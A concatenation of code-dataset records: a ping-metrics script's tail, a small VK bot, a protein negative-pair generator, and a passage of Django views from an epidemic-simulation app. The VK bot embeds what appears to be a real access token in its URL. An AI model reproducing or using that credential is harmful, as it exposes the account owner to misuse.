output.write(\"Average Reply Delay (microseconds),\"+str(round(avgDelay, 2))+\"\\n\")\n output.write(\"Average Echo Request Hop Count,\"+str(round(avgHop, 2))+\"\\n\")\n output.write('\\n')\n\n#Returns metrics to terminal window.\n print(\"Node \" + str(nodeVal) +\" Results:\")\n print()\n print(\"Echo Requests Sent: \" + str(reqSent))\n print(\"Echo Requests Received: \" + str(reqRecv))\n print(\"Echo Reply Sent: \" + str(repSent))\n print(\"Echo Reply Received: \" + str(repRecv))\n print(\"Echo Request Bytes Sent: \" + str(totalReqSentFrameSize))\n print(\"Echo Request Bytes Received: \" + str(totalReqRecvFrameSize))\n print(\"Echo Request Data Sent: \" + str(totalReqSentData))\n print(\"Echo Request Data Received: \" + str(totalReqRecvData))\n print(\"Average RTT (ms): \" + str(round(avgRTT,2)))\n print(\"Echo Request Throughput (kB/sec): \" + str(round(throughput,1)))\n print(\"Echo Request Goodput (kB/sec): \" + str(round(goodput,1)))\n print(\"Average Reply Delay (us): \" + str(round(avgDelay, 2)))\n print(\"Average Echo Request Hop Count: \" + str(round(avgHop, 2)))\n print()\n\n","repo_name":"raistlindt/Simple-Packet-Analyzer-Ping-Metrics","sub_path":"compute_metrics.py","file_name":"compute_metrics.py","file_ext":"py","file_size_in_byte":4580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"31064710731","text":"import requests\n\ngetServer = 'https://api.vk.com/method/groups.getLongPollServer?group_id=166256214&v=5.50&access_token=ba777fbd7831e6fc3da8613dd838e2d14b76d8352e5f4aaf1693ccde23c1ee2f347f35d8a33d8291c701d'\n\nresponse = requests.get(getServer)\n\nkey = response.json()['response']['key']\n\n\n##\nurl = 'https://lp.vk.com/wh166256214?act=a_check&key=' + key + '&ts=1&wait=25'\n\nresponse = requests.get(url)\n\nfor update in response.json()['updates']: # check each element of the list\n\tprint(update['object']['body'])","repo_name":"dmProgr/abra1","sub_path":"bot1_VkAPI.py","file_name":"bot1_VkAPI.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"73451269652","text":"#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~get neg pairs~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nimport random\n\ndef get_protein_list(path):\n res = []\n with open(path) as f:\n for line in f:\n if line.startswith(\">\"):\n tem = line.strip()[1:]\n res.append(tem)\n return res\n\ndef neg_homologous(protein_A: str, protein_B: str, pos_filter: str,rd = 123) -> str:\n hsa_gene = get_protein_list(protein_A)\n mmu_gene = get_protein_list(protein_B)\n\n random.seed(rd)\n\n pos_pair = set()\n\n with open(pos_filter) as f:\n for line in f:\n tem = line.strip().split(\"\\t\")\n pos_pair.add(tem[1]+\"\\t\"+tem[2])\n\n # with open(\"/home/yangfang/Sash/QFO/QfO_release_2018_04/othFinder_9606_272561.txt\") as f:\n # for line in f:\n # tem = line.strip().split(\"\\t\")\n # pos_pair.add(tem[1] + \"\\t\" + tem[2])\n\n\n\n def get_random():\n a = random.choice(hsa_gene)\n m = random.choice(mmu_gene)\n pair1 = a + \"\\t\" + m\n pair2 = m + \"\\t\" + a\n return pair1,pair2\n w_name = pos_filter.split(\".\")[0] + \"-neg\" + \".txt\"\n w_path = open(w_name,\"w\")\n set_res = set()\n while(len(set_res) != len(pos_pair)*10):\n # print(len(set_res))\n pair1, pair2 = get_random()\n # if pair1 not in pos_pair and pair2 not in pos_pair:\n # if pair1 not in set_res and pair2 not in set_res:\n # set_res.add(pair1)\n if pair1 not in pos_pair:\n if pair1 not in set_res:\n set_res.add(pair1)\n for line in set_res:\n w_path.write(\"0\" + \"\\t\" + line +\"\\n\")\n w_path.close()\n return w_name\n\nif __name__ == '__main__':\n protein_a =\"\"\n protein_b =\"\"\n pos_filter =\"\"\n rd = 123\n neg_homologous(protein_A= protein_a,\n protein_B= protein_b,\n pos_filter= pos_filter,\n rd=rd)","repo_name":"yangfangs/OrthoSash","sub_path":"prepare_ncbi_homolog_neg_pair.py","file_name":"prepare_ncbi_homolog_neg_pair.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"16299279349","text":"import csv\nimport subprocess\nimport itertools\nimport platform\n\nfrom collections import OrderedDict\n\nfrom django.http import JsonResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.forms.models import modelformset_factory\nfrom django.db.models import Q, ObjectDoesNotExist\nfrom django.db import OperationalError, transaction\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom Results.models import * # This is absolutely necessary for dynamic form loading\nfrom ScenarioCreator.models import * # This is absolutely necessary for dynamic form loading\nfrom ScenarioCreator.forms import * # This is absolutely necessary for dynamic form loading\nfrom ADSMSettings.models import unsaved_changes\nfrom ADSMSettings.utils import graceful_startup, file_list, handle_file_upload, workspace_path, adsm_executable_command\nfrom ScenarioCreator.population_parser import lowercase_header\nfrom ScenarioCreator.utils import convert_user_notes_to_unit_id\nfrom ScenarioCreator.models import VaccinationRingRule, RelationalFunction, ProbabilityDensityFunction\nfrom ScenarioCreator.exporter import *\nfrom ScenarioCreator.importer import *\nfrom ScenarioCreator import function_graphs\nfrom matplotlib import pyplot as 
plt\n\n\n# Useful descriptions of some of the model relations that affect how they are displayed in the views\nfrom ScenarioCreator.utils import whole_scenario_validation\n\nsingletons = ['Scenario', 'Population', 'Disease', 'VaccinationGlobal', 'OutputSettings', \"DestructionGlobal\", \"ControlMasterPlan\"]\nabstract_models = {\n 'Function':\n [('RelationalFunction', RelationalFunction),\n ('ProbabilityDensityFunction', ProbabilityDensityFunction)],\n 'DiseaseSpread':\n [('DirectSpread', DirectSpread),\n ('IndirectSpread', IndirectSpread),\n ('AirborneSpread', AirborneSpread)],\n}\n\nspread_types = {'DirectSpread': (DirectSpread, 'direct_contact_spread'),\n 'IndirectSpread': (IndirectSpread, 'indirect_contact_spread'),\n 'AirborneSpread': (AirborneSpread, 'airborne_spread')}\n\ndef spaces_for_camel_case(text):\n return re.sub(r'([a-z])([A-Z])', r'\\1 \\2', text)\n\n\ndef add_breadcrumb_context(context, model_name, primary_key=None):\n context['pretty_name'] = spaces_for_camel_case(promote_to_abstract_parent(model_name))\n if model_name not in singletons:\n context['model_link'] = '/setup/' + model_name + '/'\n if primary_key is not None:\n context['model_link'] += primary_key + '/'\n else: # for singletons, don't list the specific name, just the type\n context['title'] = 'Edit the ' + spaces_for_camel_case(model_name)\n\n\ndef population_panel_only(request):\n \"\"\"#707 Fix by loading the production group section dynamically\n When creating new Production Type Groups, the population panel needs to be loaded asynchronously, but\n the contents depends on the context processor, which is normally only run on non-ajax requests. This function\n collects the context in Ajax calls\"\"\"\n context = {'ProductionGroups': ProductionGroup.objects.all()}\n return render(request, 'population_panel.html', context)\n\n\ndef production_type_list_json(request):\n msg = list(ProductionType.objects.values_list('name', 'id'))\n return JsonResponse(msg, safe=False) # necessary to serialize a list object\n\n\ndef jsonify(string_list):\n \"\"\"Returns the name of the specific assignment or None\"\"\"\n if string_list:\n return string_list[0]\n else:\n return None\n\n\ndef population_panel_status_json(request):\n response = []\n\n for pt in ProductionType.objects.all():\n response.append({'name': pt.name,\n 'pk': pt.id,\n 'unit_count': Unit.objects.filter(production_type=pt).count(),\n 'spread': DiseaseSpreadAssignment.objects.filter(destination_production_type=pt).filter(\n Q(direct_contact_spread__isnull=False,) |\n Q(indirect_contact_spread__isnull=False) |\n Q(airborne_spread__isnull=False)).count(),\n 'control': jsonify(ProtocolAssignment.objects.filter(control_protocol__isnull=False, production_type=pt).values_list('control_protocol__name', flat=True)),\n 'progression': jsonify(DiseaseProgressionAssignment.objects.filter(progression__isnull=False, production_type=pt).values_list('progression__name', flat=True)),\n 'zone': jsonify(ZoneEffectAssignment.objects.filter(effect__isnull=False, production_type=pt).values_list('zone__name', flat=True)),\n })\n\n return JsonResponse(response, safe=False)\n\n\ndef spread_options_json(request): # list of DiseaseSpreads by Type\n options = {\n 'DirectSpread': {d.id: {'name': d.name, 'pk': d.id} for d in DirectSpread.objects.all()},\n 'IndirectSpread': {d.id: {'name': d.name, 'pk': d.id} for d in IndirectSpread.objects.all()},\n 'AirborneSpread': {d.id: {'name': d.name, 'pk': d.id} for d in AirborneSpread.objects.all()}\n }\n return JsonResponse(options)\n\n\ndef 
spread_inputs_json(request):\n options = {}\n for class_name, meta in spread_types.items():\n model, field_name = meta\n options[class_name] = {}\n for spread in model.objects.all():\n inputs = []\n for source in ProductionType.objects.all():\n query = DiseaseSpreadAssignment.objects.filter(**{'source_production_type': source, field_name: spread})\n if query.exists():\n one_source = {'source': source.id,\n 'destinations': [pair.destination_production_type.id for pair in query]}\n inputs.append(one_source)\n\n options[class_name][spread.id] = inputs\n return JsonResponse(options)\n\n\ndef modify_spread_assignments(request):\n \"\"\"\n called when a request to change the spread assignements is made. This function is called for all three spread assignment types\n :param request:\n :return: json summary of the request\n \"\"\"\n # destinations is a list of integer ids\n destinations = [int(x) for x in request.POST.getlist('destinations[]')]\n # if a non-blank selection was made\n if 'destinations[]' in request.POST.keys() and request.POST['source']: # when a user selects ----- there's no PK at all\n data = request.POST.dict()\n # if a spread assignment is being CREATED\n if 'POST' == data['action']:\n # for each destination\n for destination_pk in destinations:\n assignment = DiseaseSpreadAssignment.objects.filter(**{'source_production_type_id': int(data['source']),\n 'destination_production_type_id': int(destination_pk)})\n parameter_class, field = spread_types[data['spread_type']]\n assignment.update(**{field: parameter_class.objects.get(id=int(data['pk']))}) # saves immediately\n # Debug output:\n source = ProductionType.objects.get(id= int(data['source'])).name\n destination = ProductionType.objects.get(id=int(destination_pk)).name\n print(\"ADD\", field, \"SOURCE:\", source, \"DESTINATION:\", destination)\n\n # if a spread assignment is being DELETED\n if 'DELETE' == data['action']: # Django doesn't allow you to parametrize DELETE http_method\n # for each destination\n for destination_pk in destinations:\n assignment = DiseaseSpreadAssignment.objects.filter(**{'source_production_type_id': int(data['source']),\n 'destination_production_type_id': int(destination_pk)})\n parameter_class, field = spread_types[data['spread_type']]\n assignment.update(**{field: None}) # saves immediately\n # Debug output:\n source = ProductionType.objects.get(id= int(data['source'])).name\n destination = ProductionType.objects.get(id=int(destination_pk)).name\n print(\"DEL\", field, \"SOURCE:\", source, \"DESTINATION:\", destination)\n\n return spread_inputs_json(request)\n\n\ndef disease_spread_assignments_json(request):\n source_rows = {}\n for source in ProductionType.objects.all().order_by('name'):\n one_row = {'name': source.name, 'pk': source.id, 'destinations': {}}\n for destination in ProductionType.objects.all().order_by('name'):\n assignment = {'name': destination.name, 'pk': destination.id, 'DirectSpread': None, 'IndirectSpread': None,\n 'AirborneSpread': None}\n query = DiseaseSpreadAssignment.objects.filter(source_production_type=source,\n destination_production_type=destination)\n if query.exists():\n assignment['DirectSpread'] = query.first().direct_contact_spread_id\n assignment['IndirectSpread'] = query.first().indirect_contact_spread_id\n assignment['AirborneSpread'] = query.first().airborne_spread_id\n one_row['destinations'][destination.name] = assignment\n source_rows[source.name] = one_row\n return JsonResponse(source_rows, safe=False)\n\n\ndef disable_all_controls_json(request):\n if 
'POST' in request.method:\n new_value = request.POST['use_controls']\n set_to = new_value == 'false' # logical inversion because of use_controls vs disable_controls\n controls = VaccinationGlobal.objects.get()\n controls.disable_all_controls = set_to\n controls.save()\n return JsonResponse({'status': 'success'})\n else:\n return JsonResponse({'disable_all_controls': VaccinationGlobal.objects.get().disable_all_controls})\n \n\ndef initialize_spread_assignments():\n pts = list(ProductionType.objects.all())\n for source in pts:\n for destination in pts:\n DiseaseSpreadAssignment.objects.get_or_create(\n source_production_type=source,\n destination_production_type=destination)\n \n\ndef assign_disease_spread(request):\n initialize_spread_assignments()\n\n context = {'base_page': 'ScenarioCreator/AssignSpread.html'}\n return render(request, 'ScenarioCreator/MainPanel.html', context)\n\n\ndef zone_effects(request):\n ZoneEffectAssignment.objects.ensure_all_zones_and_production_types()\n assignment_form_set = modelformset_factory(ZoneEffectAssignment, form=ZoneEffectAssignmentForm, extra=0)\n\n context = {'title': 'What Effect does a Zone have on each Production Type?'}\n if save_formset_succeeded(assignment_form_set, ZoneEffectAssignment, context, request):\n return redirect(request.path)\n else:\n forms = assignment_form_set(queryset=ZoneEffectAssignment.objects.all())\n forms_sorted_by_pt = sorted(forms, key=lambda x: x.instance.production_type.name)\n forms_grouped_by_pt = itertools.groupby(forms_sorted_by_pt, lambda x: x.instance.production_type)\n\n context['formset'] = assignment_form_set\n context['formset_headings'] = Zone.objects.order_by('id')\n context['formset_grouped'] = {k: sorted(v, key=lambda x: x.instance.zone.id) \n for k,v in forms_grouped_by_pt}\n context['base_page'] = 'ScenarioCreator/FormSet2D.html'\n\n return render(request, 'ScenarioCreator/MainPanel.html', context)\n\n\ndef save_formset_succeeded(MyFormSet, TargetModel, context, request):\n try:\n initialized_formset = MyFormSet(request.POST, request.FILES, queryset=TargetModel.objects.all())\n if initialized_formset.is_valid():\n instances = initialized_formset.save()\n context['formset'] = initialized_formset\n return True\n return False\n except ValidationError:\n return False\n\n\ndef populate_forms_matching_ProductionType(MyFormSet, TargetModel, context, missing, request, template='ScenarioCreator/3Panels.html',\n html='ScenarioCreator/AssignmentList.html'):\n \"\"\"FormSet is pre-populated with existing assignments and it detects and fills in missing\n assignments with a blank form with production type filled in.\"\"\"\n if save_formset_succeeded(MyFormSet, TargetModel, context, request):\n return redirect(request.path)\n else:\n forms = MyFormSet(queryset=TargetModel.objects.all())\n for index, pt in enumerate(missing):\n index += TargetModel.objects.count()\n forms[index].fields['production_type'].initial = pt.id\n context['formset'] = forms\n context['base_page'] = html\n return render(request, template, context)\n\n\ndef assign_protocols(request):\n missing = ProductionType.objects.filter(protocolassignment__isnull=True)\n ProtocolSet = modelformset_factory(ProtocolAssignment, extra=len(missing), form=ProtocolAssignmentForm)\n context = {'title': 'Assign a Control Protocol to each Production Type'}\n return populate_forms_matching_ProductionType(ProtocolSet, ProtocolAssignment, context, missing, request,\n template='ScenarioCreator/MainPanel.html',\n html='ScenarioCreator/FormSet.html')\n\n\ndef 
assign_progressions(request):\n \"\"\"FormSet is pre-populated with existing assignments and it detects and fills in missing\n assignments with a blank form with production type filled in.\"\"\"\n initialize_spread_assignments()\n missing = ProductionType.objects.filter(diseaseprogressionassignment__isnull=True)\n ProgressionSet = modelformset_factory(DiseaseProgressionAssignment,\n extra=len(missing),\n form=DiseaseProgressionAssignmentForm)\n context = {'title': 'Assign Disease Progressions'}\n return populate_forms_matching_ProductionType(ProgressionSet, DiseaseProgressionAssignment, context, missing, request,\n template='ScenarioCreator/MainPanel.html')\n\n\ndef protocols_json(request):\n data = []\n for protocol in ControlProtocol.objects.all():\n entry = {'name': str(protocol.name),\n 'pk': protocol.id,\n 'tabs': [\n {'name':'Detection', 'can_select': True, 'enabled':bool(protocol.use_detection), 'field':'use_detection', 'valid': protocol.tab_is_valid('use_detection')},\n {'name':'Tracing', 'can_select': True, 'enabled':bool(protocol.use_tracing), 'field':'use_tracing', 'valid': protocol.tab_is_valid('use_tracing')},\n {'name':'Testing', 'can_select': True, 'enabled':bool(protocol.use_testing), 'field':'use_testing', 'valid': protocol.tab_is_valid('use_testing')},\n {'name':'Exams', 'can_select': True, 'enabled':bool(protocol.use_exams), 'field':'use_exams', 'valid': protocol.tab_is_valid('use_exams')},\n {'name':'Destruction', 'can_select': True, 'enabled':bool(protocol.use_destruction), 'field':'use_destruction', 'valid': protocol.tab_is_valid(\n 'use_destruction')},\n {'name':'Vaccination', 'can_select': False, 'enabled':bool(vaccination_trigger_in_use(protocol)), 'field':'use_vaccination', 'valid': protocol.tab_is_valid(\n 'use_vaccination')},\n {'name':'Cost Accounting', 'can_select': True, 'enabled':bool(protocol.use_cost_accounting), 'field':'use_cost_accounting', 'valid': protocol.tab_is_valid(\n 'use_cost_accounting')},\n ]}\n data.append(entry)\n return JsonResponse(data, safe=False)\n\n\ndef update_protocol_enabled(request, primary_key, field):\n \"\"\"Does nothing but save the `field` value to the database. Ex: use_detection use_tracing use_destruction\n use_vaccination use_exams use_testing use_cost_accounting\"\"\"\n #data = json.loads(request.POST.content.decode())\n value = request.POST.get('value') == 'true' #False otherwise\n ControlProtocol.objects.filter(id=int(primary_key)).update(**{field: value}) # specifically the value of field, not the word 'field'\n return JsonResponse({})\n\ndef collect_backlinks(model_instance):\n \"\"\":param model_instance: Django Model Instance\n :return: A dict of Models that reference the current\n Useful for determining if an instance can be deleted. 
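A minimal usage sketch (the instance and output shown are illustrative)::\n\n        links = collect_backlinks(some_control_protocol)\n        # {'ProtocolAssignment object': '/setup/ProtocolAssignment/5/'}\n\n    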
Includes hyperlinks to the related models\n \"\"\"\n from django.contrib.admin.utils import NestedObjects\n collector = NestedObjects(using='scenario_db') # or specific database\n collector.collect([model_instance]) # https://docs.djangoproject.com/en/1.7/releases/1.7/#remove-and-clear-methods-of-related-managers\n dependants = collector.nested() # fun fact: spelling differs between America and Britain\n #print(\"Found related models:\", dependants)\n links = {}\n if dependants[1:]:\n for direct_reference in dependants[1:][0]: # only iterates over the top level\n if not isinstance(direct_reference, list) and not isinstance(direct_reference, RelationalPoint): # Points are obvious, don't include them\n name = direct_reference.__class__.__name__\n try: # not everything has a name attr\n links[str(direct_reference)] = '/setup/%s/%i/' % (name, direct_reference.pk)\n except Exception:\n links['%s:%i' % (name, direct_reference.pk)] = '/setup/%s/%i/' % (name, direct_reference.pk)\n #print(links)\n return links\n\n\ndef initialize_relational_form(context, primary_key, request):\n if not primary_key or primary_key == 'new':\n model = RelationalFunction()\n main_form = RelationalFunctionForm(request.POST or None)\n else:\n model = RelationalFunction.objects.get(id=primary_key)\n main_form = RelationalFunctionForm(request.POST or None, instance=model)\n context['model_link'] = '/setup/RelationalFunction/%s/' % (primary_key or 'new') # primary_key can be None for a new function\n context['backlinks'] = collect_backlinks(model)\n context['deletable'] = context['model_link'] + 'delete/'\n context['form'] = main_form\n context['model'] = model\n return context\n\ndef export_functions(request, block):\n '''\n \"Functions\" as in relational functions and probability density functions.\n\n Exports to a single file, delimited by \"REL_\" for relational functions and \"PDF_\" for probability density functions.\n Files are saved in the same folder as the .db for each scenario. Exporting the same scenario multiple times overwrites\n the existing file.\n :param block: \"rel\" or \"pdf\" to determine which export to run.\n :return: Redirect to the scenario description.\n '''\n if block == \"rel\":\n # get the relational function model\n relfunction_model = globals()[\"RelationalFunction\"]\n # get all of the relational functions\n relfunction_objects = relfunction_model.objects.all()\n # get the relational function points model\n relpoints_model = globals()[\"RelationalPoint\"]\n # get all of the relational points\n relpoints_objects = relpoints_model.objects.all()\n # export the relational functions, export_relational_functions() is located in exporter.py\n export_relational_functions(relfunction_objects, relpoints_objects)\n elif block == \"pdf\":\n # get the pdf model\n pdf_model = globals()[\"ProbabilityDensityFunction\"]\n # get all of the pdfs\n pdf_objects = pdf_model.objects.all()\n # export the pdfs, export_pdfs() is located in exporter.py\n export_pdfs(pdf_objects)\n return redirect(\"/setup/Scenario/1/\")\n\ndef import_functions(request, block):\n '''\n \"Functions\" as in relational functions and probability density functions.\n\n Imports from all files located in the same location as the .db for each scenario that are delimited by \"PDF_\" for\n Probability Density Functions or \"REL_\" for relational functions. 
Will not import functions from files that include\n the current scenario's name.\n\n :param block: \"rel\" or \"pdf\" to determine which import to run.\n :return: Redirect to the scenario description.\n '''\n if block == \"rel\":\n # get the relational function model\n relfunction_model = globals()[\"RelationalFunction\"]\n # get all the existing relational functions\n relfunction_objects = relfunction_model.objects.all()\n # import new relational functions, import_relational_functions() is located in importer.py\n import_relational_functions(relfunction_objects)\n elif block == \"pdf\":\n # get the pdf model\n pdf_model = globals()[\"ProbabilityDensityFunction\"]\n # get all of the existing pdfs\n pdf_objects = pdf_model.objects.all()\n # import new pdfs, import_pdfs() is located in importer.py\n import_pdfs(pdf_objects)\n return redirect(\"/setup/Scenario/1/\")\n\ndef deepcopy_points(request, primary_key, created_instance):\n queryset = RelationalPoint.objects.filter(relational_function_id=primary_key)\n for point in queryset: # iterating over points already in DB\n new_point = RelationalPoint(relational_function=created_instance, x=point.x, y=point.y) # copy with new parent\n new_point.save() # This assumes that things in the database are already valid, so doesn't call is_valid()\n queryset = RelationalPoint.objects.filter(relational_function_id=created_instance.id)\n formset = PointFormSet(queryset=queryset) # this queryset does not include anything the user typed in, during the copy operation\n # formset = PointFormSet(request.POST or None, instance=created_instance)\n return formset\n\n\ndef initialize_points_from_csv(request):\n \"\"\" Uses a file upload to create a series of points and add them to the request\n :param request: request that contains the file upload\n :return: request with initial_values set\n \"\"\"\n file_path = handle_file_upload(request, is_temp_file=True, overwrite_ok=True)\n with open(file_path) as csvfile:\n dialect = csv.Sniffer().sniff(csvfile.read(1024)) # detect the CSV dialect (delimiter, quoting)\n csvfile.seek(0)\n header = csv.Sniffer().has_header(csvfile.read(1024))\n csvfile.seek(0)\n if header:\n header = None # DictReader will pull it off the first line\n else:\n header = ['x', 'y']\n reader = csv.DictReader(lowercase_header(csvfile), fieldnames=header, dialect=dialect)\n entries = [line for line in reader] # ordered list\n try:\n (float(entries[0]['x']), float(entries[0]['y'])) # the header sneaks in when there's a mix of float and int\n except ValueError:\n entries = entries[1:] # clip the header\n \n initial_values = {}\n for index, point in enumerate(entries):\n initial_values['relationalpoint_set-%i-id' % index] = ''\n initial_values['relationalpoint_set-%i-relational_function' % index] = ''\n initial_values['relationalpoint_set-%i-x' % index] = point['x'].strip()\n initial_values['relationalpoint_set-%i-y' % index] = point['y'].strip()\n initial_values['relationalpoint_set-%i-DELETE' % index] = '' # these could be set to delete by the js\n initial_values['relationalpoint_set-TOTAL_FORMS'] = str(len(entries))\n initial_values['relationalpoint_set-INITIAL_FORMS'] = '0'\n initial_values['relationalpoint_set-MAX_NUM_FORMS'] = '1000'\n request.POST.update(initial_values)\n return request\n\n\ndef relational_function(request, primary_key=None, doCopy=False):\n \"\"\"This handles the edge case of saving, copying, and creating Relational Functions. RFs are different from any\n other model in ADSM in that they have a list of RelationalPoints. 
These points are listed alongside the normal form.\n Rendering this page means render a form, then a formset of points. Saving is more complex because the points also\n foreignkey back to the RelationalFunction which must be created before it can be referenced.\n\n It is possible to integrate this code back into the standard new / edit / copy views by checking for\n context['formset']. The extra logic for formsets could be kicked in only when one or more formsets are present. At\n the moment integration looks like a bad idea because it would mangle the happy path for the sake of one edge case.\n :param request:\n :param primary_key: None or a number if editing\n :param doCopy: copying will clear old primary keys so django will create new entries\"\"\"\n context = initialize_relational_form({}, primary_key, request)\n context['action'] = request.path\n if 'file' in request.FILES: # data file is present\n request = initialize_points_from_csv(request)\n if context['form'].is_valid():\n created_instance = None\n if doCopy:\n created_instance = context['form'].instance\n created_instance.pk = None # This will cause a new instance to be created\n created_instance.save()\n context['formset'] = PointFormSet(request.POST or None, instance=created_instance)\n else:\n created_instance = context['form'].instance\n created_instance.save()\n context['formset'] = PointFormSet(request.POST or None, instance=created_instance)\n\n context['action'] = '/setup/RelationalFunction/%i/' % created_instance.id\n\n if created_instance:\n if context['formset'].is_valid(): # We need to run this to ensure that the data in the formset is populated\n pass\n if doCopy:\n # If the user clicked the +f() Variant button, then all of the rows that have data filled in will count\n # as changed. The points started as exact copies of the points from another relational function, so we\n # need to (1) erase their primary keys so they count as new objects, and (2) make this new relational\n # function their parent.\n for point in context['formset'].forms:\n if point.changed_data:\n point.instance.pk = None\n point.instance.relational_function = created_instance\n point.instance.save()\n else:\n # If the user clicked the Overwrite button, all we want is a delete() on any points for which the\n # Delete checkbox was checked, and a save() on any points that have changed.\n for point in context['formset'].forms:\n if point.changed_data:\n if point.cleaned_data['DELETE']:\n point.instance.delete()\n else:\n point.instance.save()\n return HttpResponseRedirect(context['action'])\n else:\n context['formset'] = PointFormSet(request.POST or None, instance=context['model'])\n\n context['title'] = \"Create a Relational Function\"\n add_breadcrumb_context(context, \"RelationalFunction\")\n return render(request, 'ScenarioCreator/RelationalFunction.html', context)\n\n\ndef save_new_instance(initialized_form, request, context):\n model_instance = initialized_form.save() # write to database\n model_name = model_instance.__class__.__name__\n context['model_name'] = model_name\n if model_name in singletons: #they could have their own special page: e.g. 
Population\n return redirect('/setup/%s/1/' % model_name)\n if request.is_ajax():\n return HttpResponseRedirect('/setup/%s/%s' % (model_name, model_instance.id))\n return render(request, 'ScenarioCreator/crispy-model-form.html', context)\n\n\ndef new_form(request, initialized_form, context):\n if initialized_form.is_valid():\n model_instance = initialized_form.save() # write to database\n link = context['action'].split('/')\n context['action'] = '/' + '/'.join([link[1], link[2], str(model_instance.id)]) + '/' # not new if it has an id\n model_name, model = get_model_name_and_model(request)\n context['model_name'] = model_name\n if model_name in singletons: # they could have their own special page: e.g. Population\n context['base_page'] = 'ScenarioCreator/Crispy-Singleton-Form.html'\n # #422 Singleton models now load in a fragment to be refreshed the same way that other forms\n # are loaded dynamically\n return render(request, 'ScenarioCreator/MainPanel.html', context)\n if model_name == 'ProbabilityDensityFunction':\n return render(request, 'ScenarioCreator/ProbabilityDensityFunctionForm.html', context)\n return render(request, 'ScenarioCreator/crispy-model-form.html', context) # render in validation error messages\n\n\ndef get_model_name_and_form(request):\n model_name = re.split(r'\\W+', request.path)[2] # Second word in the URL\n form = globals()[model_name + 'Form'] # IMPORTANT: depends on naming convention\n return model_name, form\n\n\ndef get_model_name_and_model(request):\n \"\"\"A slight variation on get_model_name_and_form useful for cases where you don't want a form\"\"\"\n model_name = re.split(r'\\W+', request.path)[2] # Second word in the URL\n model = globals()[model_name] # IMPORTANT: depends on import *\n return model_name, model\n\n\ndef initialize_from_existing_model(primary_key, request):\n \"\"\"Raises an ObjectDoesNotExist exception when the primary_key is invalid\"\"\"\n model_name, form_class = get_model_name_and_form(request)\n model = form_class.Meta.model.objects.get(id=primary_key) # may raise an exception\n initialized_form = form_class(request.POST or None, instance=model)\n return initialized_form, model_name\n\n\n'''New / Edit / Copy / Delete / List that are called from model generated URLs'''\ndef new_entry(request, second_try=False):\n try:\n model_name, form = get_model_name_and_form(request)\n model_name, model = get_model_name_and_model(request)\n if model_name == 'RelationalFunction':\n return relational_function(request)\n if model_name in singletons and model.objects.count():\n return edit_entry(request, 1)\n initialized_form = form(request.POST or None)\n context = {'form': initialized_form,\n 'title': \"Create a new \" + spaces_for_camel_case(model_name),\n 'action': request.path,\n 'new_form': True}\n add_breadcrumb_context(context, model_name)\n return new_form(request, initialized_form, context)\n except OperationalError:\n if not second_try:\n graceful_startup()\n return new_entry(request, True)\n raise # the form was never created on this code path, so re-raise instead of referencing an unbound variable\n\n\ndef edit_entry(request, primary_key):\n model_name, form = get_model_name_and_form(request)\n if model_name == 'RelationalFunction':\n return relational_function(request, primary_key)\n\n try:\n initialized_form, model_name = initialize_from_existing_model(primary_key, request)\n except (ObjectDoesNotExist, OperationalError):\n request.path = '/setup/%s/new/' % model_name\n return new_entry(request)\n context = {'form': initialized_form,\n 'title': str(initialized_form.instance),\n 'action': 
request.path}\n add_breadcrumb_context(context, model_name, primary_key)\n\n if model_name == 'ProbabilityDensityFunction':\n context['backlinks'] = collect_backlinks(initialized_form.instance)\n context['deletable'] = '/setup/ProbabilityDensityFunction/%s/delete/' % primary_key\n\n if hasattr(initialized_form, 'soft_clean'):\n initialized_form.soft_clean(request.method)\n\n return new_form(request, initialized_form, context)\n\n\ndef copy_entry(request, primary_key):\n model_name, form = get_model_name_and_form(request)\n if model_name == 'RelationalFunction':\n return relational_function(request, primary_key, doCopy=True)\n try:\n initialized_form, model_name = initialize_from_existing_model(primary_key, request)\n if 'name' in initialized_form.fields: # check the fields dict; `in` on a Form iterates BoundFields and never matches a string\n initialized_form.initial['name'] += \" - Copy\"\n except ObjectDoesNotExist:\n return redirect('/setup/%s/new/' % model_name)\n context = {'form': initialized_form,\n 'title': \"Copy a \" + spaces_for_camel_case(model_name),\n 'action': request.path,\n 'model_name': model_name}\n if initialized_form.is_valid() and request.method == 'POST':\n initialized_form.instance.pk = None # This will cause a new instance to be created\n return save_new_instance(initialized_form, request, context)\n return render(request, 'ScenarioCreator/crispy-model-form.html', context)\n\n\ndef delete_entry(request, primary_key):\n model_name, model = get_model_name_and_model(request)\n model.objects.get(pk=primary_key).delete()\n unsaved_changes(True)\n if model_name not in singletons:\n return redirect('/setup/%s/' % model_name) # model list\n else:\n if model_name == \"Population\":\n print(\"Deleting Population Dependent Models.\")\n\n try:\n VaccinationRingRuleModel = globals()[\"VaccinationRingRule\"]\n VaccinationRingRuleModel.objects.get(pk=1).delete()\n except VaccinationRingRule.DoesNotExist:\n pass\n\n try:\n VaccinationGlobalModel = globals()[\"VaccinationGlobal\"]\n VaccinationGlobalModel.objects.get(pk=1).delete()\n except VaccinationGlobal.DoesNotExist:\n pass\n\n try:\n DiseaseDetectionModel = globals()[\"DiseaseDetection\"]\n DiseaseDetectionObjects = DiseaseDetectionModel.objects.all()\n for DiseaseDetectionObject in DiseaseDetectionObjects:\n DiseaseDetectionObject.delete()\n except DiseaseDetection.DoesNotExist:\n pass\n\n try:\n StopVaccinationModel = globals()[\"StopVaccination\"]\n StopVaccinationObjects = StopVaccinationModel.objects.all()\n for StopVaccinationObject in StopVaccinationObjects:\n StopVaccinationObject.delete() # delete the instance, not the model class\n except StopVaccination.DoesNotExist:\n pass\n\n print(\"Population Deletion Complete. 
